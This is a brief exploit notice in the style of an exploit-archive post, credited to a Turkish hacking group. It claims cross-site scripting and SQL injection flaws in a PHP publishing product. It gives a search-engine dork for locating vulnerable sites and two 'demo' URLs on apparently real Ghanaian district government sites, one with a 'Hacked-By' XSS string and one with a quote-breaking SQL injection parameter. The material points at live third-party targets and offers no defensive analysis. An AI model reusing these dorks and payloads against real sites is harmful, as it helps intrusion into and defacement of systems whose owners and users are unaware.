Maks Publication and Media Services suffers from cross site scripting and remote SQL injection vulnerabilities.
5e97f07e54e925afc445353cae79b79345b9fd60971614929c0a19f16d7da7f3
# Exploit Title: Maks Publications & Media Services Multiple Vulnerability
# Date: 06.12.2011 - 17:55
# Author: 3spi0n
# Software Website: Not Sites - Not E-mail Because Working With Ghana
Assembly (:
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Dorks: "Maks Publications & media services"
[#] Vulnerable File : All
[$] Demo Sites:
[~] http://www.ghanalocalassemblies.com/dces/?ad=Hacked-By-3spi0n [HtmlXSS]
[~] http://www.ghanadistricts.com/districts/?news&r=3&_=51" [PhpSQLi]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
# Greetz: DarkDevilz.in - 3spi0n.net
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
# DarkDevilz - Defence And Destruction Group'z - TURKEY #
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>